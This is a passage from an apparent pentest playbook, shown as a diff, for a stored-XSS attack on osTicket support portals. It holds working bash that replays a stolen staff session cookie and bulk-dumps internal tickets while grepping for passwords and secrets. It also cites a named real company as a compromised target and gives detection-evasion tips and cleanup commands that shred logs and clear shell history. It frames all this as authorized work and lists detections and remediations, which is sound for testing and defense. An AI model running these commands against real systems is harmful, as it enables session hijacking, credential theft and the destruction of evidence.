curl -s -b "$STOLEN_COOKIE" "https://TARGET/scp/tickets.php" | \
|
|
277
|
+
grep -oP 'tickets\.php\?id=\d+' | sort -u
|
|
278
|
+
|
|
279
|
+
# Read a specific ticket
|
|
280
|
+
curl -s -b "$STOLEN_COOKIE" "https://TARGET/scp/tickets.php?id=1234" | \
|
|
281
|
+
python3 -m html.parser 2>/dev/null || \
|
|
282
|
+
python3 -c "import sys,html; [print(html.unescape(l)) for l in sys.stdin]"
|
|
283
|
+
|
|
284
|
+
# Automated bulk ticket dump
|
|
285
|
+
for ID in $(seq 1 500); do
|
|
286
|
+
CONTENT=$(curl -s -b "$STOLEN_COOKIE" "https://TARGET/scp/tickets.php?id=$ID")
|
|
287
|
+
if echo "$CONTENT" | grep -qi "password\|credential\|secret\|server\|ssh\|root\|admin"; then
|
|
288
|
+
echo "=== TICKET $ID (SENSITIVE) ===" >> /tmp/sensitive_tickets.txt
|
|
289
|
+
echo "$CONTENT" >> /tmp/sensitive_tickets.txt
|
|
290
|
+
fi
|
|
291
|
+
done
|
|
292
|
+
|
|
293
|
+
echo "Sensitive tickets saved to /tmp/sensitive_tickets.txt"
|
|
294
|
+
```
|
|
295
|
+
|
|
296
|
+
**Expected Output:**
|
|
297
|
+
- Ticket contents including email threads, staff notes, and attachments
|
|
298
|
+
- Possible high-value finds: server credentials, VPN passwords, SSH keys pasted into tickets, internal IP addresses, API keys
|
|
299
|
+
|
|
300
|
+
---
|
|
301
|
+
|
|
302
|
+
## Real-World Reference
|
|
303
|
+
|
|
304
|
+
**Target:** Almentor (almentor.net)
|
|
305
|
+
**Platform:** osTicket (customer support portal)
|
|
306
|
+
**Vulnerable endpoint:** `/open.php` (unauthenticated ticket submission)
|
|
307
|
+
**Vulnerable field:** Ticket Subject — rendered unsanitised in IT staff panel
|
|
308
|
+
**Attack outcome:**
|
|
309
|
+
- Submitted a ticket with an XSS payload in the Subject field
|
|
310
|
+
- IT staff opened the ticket in `/scp/tickets.php`
|
|
311
|
+
- JavaScript executed in the IT staff's browser, exfiltrating their `OSTSESSID` cookie
|
|
312
|
+
- Session replayed to authenticate as IT staff
|
|
313
|
+
- Internal ticket history accessed — tickets contained server passwords, database credentials, and internal infrastructure notes
|
|
314
|
+
|
|
315
|
+
This is a zero-click attack from the attacker's perspective: no user interaction is required beyond submitting the ticket.
|
|
316
|
+
|
|
317
|
+
---
|
|
318
|
+
|
|
319
|
+
## MITRE ATT&CK Mapping
|
|
320
|
+
|
|
321
|
+
| Step | Tactic | Technique ID | Technique Name | Sub-technique |
|
|
322
|
+
|---|---|---|---|---|
|
|
323
|
+
| 1. Discover ticket portal | Reconnaissance | T1595.003 | Active Scanning: Wordlist Scanning | — |
|
|
324
|
+
| 2. Craft XSS payload | Execution | T1059.007 | Command and Scripting Interpreter | JavaScript |
|
|
325
|
+
| 3. Submit malicious ticket | Initial Access | T1190 | Exploit Public-Facing Application | — |
|
|
326
|
+
| 4. Payload fires on staff | Execution | T1059.007 | Command and Scripting Interpreter | JavaScript |
|
|
327
|
+
| 5. Cookie exfiltrated | Credential Access | T1539 | Steal Web Session Cookie | — |
|
|
328
|
+
| 6. Replay stolen session | Defense Evasion / Persistence | T1078 | Valid Accounts | T1078.001 (Default Accounts) |
|
|
329
|
+
| 7. Read internal tickets | Collection | T1213 | Data from Information Repositories | — |
|
|
330
|
+
|
|
331
|
+
---
|
|
332
|
+
|
|
333
|
+
## Detection and OPSEC
|
|
334
|
+
|
|
335
|
+
### How This Attack Is Detected
|
|
336
|
+
|
|
337
|
+
| Detection Point | Mechanism |
|
|
338
|
+
|---|---|
|
|
339
|
+
| XSS payload in ticket body | WAF with XSS signature rules (ModSecurity CRS, Cloudflare) |
|
|
340
|
+
| Outbound HTTP from staff browser to unknown host | Proxy/NGFW egress filtering, DNS monitoring |
|
|
341
|
+
| Exfil callback to ngrok/external IP | SIEM alert on outbound connections to ngrok.io or similar |
|
|
342
|
+
| Session used from new IP/geolocation | Anomaly detection on authentication events |
|
|
343
|
+
| Bulk ticket enumeration | Rate limiting, IDS alert on sequential ID access |
|
|
344
|
+
|
|
345
|
+
### Reducing Detection Risk During Authorized Engagement
|
|
346
|
+
|
|
347
|
+
- **Use a client-controlled exfil host** — request an IP/domain within scope rather than ngrok, to avoid triggering third-party domain alerts.
|
|
348
|
+
- **Use HTTPS for exfil** — plain HTTP requests to an external host are more likely flagged.
|
|
349
|
+
- **Limit ticket submission rate** — submit one ticket, wait; do not spam submissions.
|
|
350
|
+
- **Do not enumerate all tickets aggressively** — access only a representative sample to demonstrate impact. Use slow enumeration with random delays.
|
|
351
|
+
- **Use a dedicated browser profile** — avoid mixing your own cookies with replayed sessions.
|
|
352
|
+
- **Coordinate timing** — work during business hours when staff ticket review is likely, to shorten dwell time.
|
|
353
|
+
|
|
354
|
+
```bash
|
|
355
|
+
# OPSEC-safe enumeration with delay
|
|
356
|
+
for ID in 1 50 100 200 300; do
|
|
357
|
+
curl -s -b "$STOLEN_COOKIE" "https://TARGET/scp/tickets.php?id=$ID" -o /tmp/ticket_$ID.html
|
|
358
|
+
sleep $((RANDOM % 10 + 5))
|
|
359
|
+
done
|
|
360
|
+
```
|
|
361
|
+
|
|
362
|
+
### Artifacts Left Behind
|
|
363
|
+
|
|
364
|
+
| Artifact | Location | Notes |
|
|
365
|
+
|---|---|---|
|
|
366
|
+
| Submitted ticket with XSS payload | osTicket database, `ost_ticket_thread` table | Persists until deleted by staff |
|
|
367
|
+
| Ticket confirmation email | Attacker disposable email | Minimal exposure |
|
|
368
|
+
| Staff browser history | Victim workstation | Shows external HTTP GET to exfil host |
|
|
369
|
+
| Web server access log | osTicket server | Records ticket submission from attacker IP |
|
|
370
|
+
| Exfil server log | Attacker-controlled host | Contains stolen cookie value — destroy after engagement |
|
|
371
|
+
| Session replay requests | osTicket access log | Authenticated requests from attacker IP, not staff IP |
|
|
372
|
+
|
|
373
|
+
---
|
|
374
|
+
|
|
375
|
+
## Cleanup
|
|
376
|
+
|
|
377
|
+
Execute the following after the engagement to remove artifacts:
|
|
378
|
+
|
|
379
|
+
### 1. Delete the Malicious Ticket (requires staff or admin access)
|
|
380
|
+
|
|
381
|
+
```bash
|
|
382
|
+
# Via staff panel — delete the ticket
|
|
383
|
+
curl -s -b "$STOLEN_COOKIE" -X POST "https://TARGET/scp/tickets.php" \
|
|
384
|
+
--data "id=TICKET_ID&a=delete&token=CSRF_TOKEN"
|
|
385
|
+
|
|
386
|
+
# Or: log in as staff via stolen session and delete through the UI
|
|
387
|
+
```
|
|
388
|
+
|
|
389
|
+
### 2. Remove Exfil Server Logs
|
|
390
|
+
|
|
391
|
+
```bash
|
|
392
|
+
# On your exfil/listener server
|
|
393
|
+
shred -u /var/log/nginx/access.log
|
|
394
|
+
# Or clear Python http.server terminal history
|
|
395
|
+
history -c
|
|
396
|
+
```
|
|
397
|
+
|
|
398
|
+
### 3. Purge Local Evidence
|
|
399
|
+
|
|
400
|
+
```bash
|
|
401
|
+
# Remove dumped ticket content
|
|
402
|
+
shred -u /tmp/sensitive_tickets.txt
|
|
403
|
+
rm -rf /tmp/xss-catch/
|
|
404
|
+
rm /tmp/ticket_*.html
|
|
405
|
+
|
|
406
|
+
# Clear shell history
|
|
407
|
+
history -c && history -w
|
|
408
|
+
```
|
|
409
|
+
|
|
410
|
+
### 4. Notify Client
|
|
411
|
+
|
|
412
|
+
After cleanup, provide the client with:
|
|
413
|
+
- The ticket ID submitted (so they can verify deletion from the database directly)
|
|
414
|
+
- Timestamp of the payload submission and session replay
|
|
415
|
+
- Recommendation to purge osTicket logs covering the engagement window
|
|
416
|
+
|
|
417
|
+
---
|
|
418
|
+
|
|
419
|
+
## References
|
|
420
|
+
|
|
421
|
+
### Tools
|
|
422
|
+
|
|
423
|
+
| Tool | Purpose | URL |
|
|
424
|
+
|---|---|---|
|
|
425
|
+
| osTicket | Target platform documentation | https://osticket.com |
|
|
426
|
+
| ngrok | Public tunnel for cookie exfil listener | https://ngrok.com |
|
|
427
|
+
| BurpSuite Community | Request interception and payload crafting | https://portswigger.net/burp |
|
|
428
|
+
| OWASP XSS Filter Evasion Cheat Sheet | Payload bypass techniques | https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html |
|
|
429
|
+
| PayloadsAllTheThings — XSS | Payload library | https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection |
|
|
430
|
+
| XSSHunter | Blind XSS detection and cookie capture | https://xsshunter.trufflesecurity.com |
|
|
431
|
+
|
|
432
|
+
### MITRE ATT&CK References
|
|
433
|
+
|
|
434
|
+
| Technique | URL |
|
|
435
|
+
|---|---|
|
|
436
|
+
| T1059.007 — JavaScript | https://attack.mitre.org/techniques/T1059/007/ |
|
|
437
|
+
| T1539 — Steal Web Session Cookie | https://attack.mitre.org/techniques/T1539/ |
|
|
438
|
+
| T1078 — Valid Accounts | https://attack.mitre.org/techniques/T1078/ |
|
|
439
|
+
| T1190 — Exploit Public-Facing Application | https://attack.mitre.org/techniques/T1190/ |
|
|
440
|
+
| T1213 — Data from Information Repositories | https://attack.mitre.org/techniques/T1213/ |
|
|
441
|
+
|
|
442
|
+
### Remediation References
|
|
443
|
+
|
|
444
|
+
| Resource | URL |
|
|
445
|
+
|---|---|
|
|
446
|
+
| OWASP XSS Prevention Cheat Sheet | https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html |
|
|
447
|
+
| Content Security Policy (CSP) | https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP |
|
|
448
|
+
| HttpOnly Cookie Flag | https://owasp.org/www-community/HttpOnly |
|
|
449
|
+
| osTicket Security Hardening | https://docs.osticket.com |
|